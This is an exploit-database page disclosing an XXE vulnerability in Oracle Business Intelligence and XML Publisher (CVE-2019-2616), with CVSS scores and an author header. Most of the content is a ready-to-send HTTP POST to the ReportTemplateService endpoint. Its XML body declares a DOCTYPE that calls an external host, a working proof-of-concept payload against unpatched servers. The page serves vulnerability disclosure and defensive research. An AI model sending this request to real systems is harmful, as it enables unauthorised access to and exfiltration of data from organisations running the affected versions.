Oracle Business Intelligence And XML Publisher XML Injection

2019.04.21
Risk: High
Local: No
Remote: Yes
CWE: CWE-284


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher # Date: 16.04.19 # Exploit Author: @vah_13 # Vendor Homepage: http://oracle.com # Software Link: https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html # Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 # Tested on: Windows # CVE : CVE-2019-2616 (7.2/10) PoC: POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: 76 Content-Type: text/xml; charset=UTF-8 <!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123> ">


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top